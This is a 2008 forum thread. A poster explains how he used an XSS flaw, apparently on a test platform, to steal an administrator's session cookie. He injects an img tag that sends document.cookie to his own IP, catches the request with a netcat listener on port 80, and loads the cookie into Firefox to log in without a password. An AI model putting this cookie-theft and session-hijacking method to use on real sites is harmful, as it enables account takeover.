cookie stolen and firefox

glubby · Post by **glubby** » 09 Jul 2008, 06:29

Hi guys,

I've got a pretty "mysterious" cookie matter. First, I wish to precise I'm working on a test platform. I found and used a XSS attack to steal a cookie.

The problem is : how to use it, so I can connect to the site with the victim identity ? The cookie has been sent to my laptop and captured with netcat. I update the cookie file of Firefox. Since then, firefox refuse to boot.

Isn't there any other way?

rhysh · Post by **rhysh** » 09 Jul 2008, 07:32

just how did u get netcat to retrieve it?

glubby · Post by **glubby** » 09 Jul 2008, 07:42

On my machine I used : nc -l -p 80
When the victim loads the page, my javascript code add an img balise which sends me the cookie on port 80. Then I've got it on my consol in a text format....

But, I don't know how to use it.

glubby · Post by **glubby** » 10 Jul 2008, 09:37

well then, I found the answer on my own. To add my cookies, I used the addon "Add N Edit Cookie"

Post by **pseudo_opcode** » 10 Jul 2008, 19:56

and would you like to throw some light on how did you send it to your server with javascript, its interesting, due to the restrictions , you must have used your own implementation of sockets, or way to send data to your server.
I would like to hear more about it, and i m sure, others would, too

glubby · Post by **glubby** » 11 Jul 2008, 02:39

Well, it's just an xss attack. I just put in an img balise with the source : http://@IP/document. cookie . I can't put the exact code on the forum, it's filtered. But, I'm sure you fill up the blank.
When, the administrator goes to delete my post on the forum, his browser execute the code and send to my computer the cookie's data of his session. So, I used netcat which is a "socket". So, as I explained before (nc -l -p 80) I received all the request of my victim in my console displayed in text mode. Then, all what is left was to add it to my browser and connect back to the administrator account without to enter any password.